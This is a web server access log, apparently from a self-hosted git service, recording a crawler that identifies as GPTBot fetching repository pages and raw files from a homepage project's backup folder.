"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11520] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" [Client 74.7.227.38] [Length 11342] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" [Client 74.7.227.38] [Length 11342] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:34:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:34:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" -[17/Feb/2026:14:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" -[17/Feb/2026:14:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" -[17/Feb/2026:14:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" [Client 74.7.227.38] [Length 13283] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" -[17/Feb/2026:14:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" [Client 74.7.227.38] [Length 13283] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" -[17/Feb/2026:14:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" -[17/Feb/2026:14:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" -[17/Feb/2026:14:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" -[17/Feb/2026:14:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" -[17/Feb/2026:14:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" -[17/Feb/2026:14:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" -[17/Feb/2026:14:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" [Client 74.7.227.38] [Length 10362] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" [Client 74.7.227.38] [Length 10361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" [Client 74.7.227.38] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" -[17/Feb/2026:14:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" -[17/Feb/2026:14:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10860] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" -[17/Feb/2026:14:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10859] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" -[17/Feb/2026:14:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" [Client 74.7.227.38] [Length 10979] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" -[17/Feb/2026:14:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" [Client 74.7.227.38] [Length 10979] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" -[17/Feb/2026:14:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10805] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" -[17/Feb/2026:14:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11495] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10805] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" -[17/Feb/2026:14:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11495] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" [Client 74.7.227.38] [Length 10603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" [Client 74.7.227.38] [Length 10605] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" -[17/Feb/2026:14:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" -[17/Feb/2026:14:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12784] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12782] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" -[17/Feb/2026:14:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" -[17/Feb/2026:14:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10756] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" -[17/Feb/2026:14:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" -[17/Feb/2026:14:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10757] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" -[17/Feb/2026:14:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" -[17/Feb/2026:14:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13900] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" -[17/Feb/2026:14:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13901] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" -[17/Feb/2026:14:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" -[17/Feb/2026:14:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12483] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" -[17/Feb/2026:14:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12481] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" -[17/Feb/2026:14:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" -[17/Feb/2026:14:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" -[17/Feb/2026:14:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" -[17/Feb/2026:14:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services" -[17/Feb/2026:14:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr 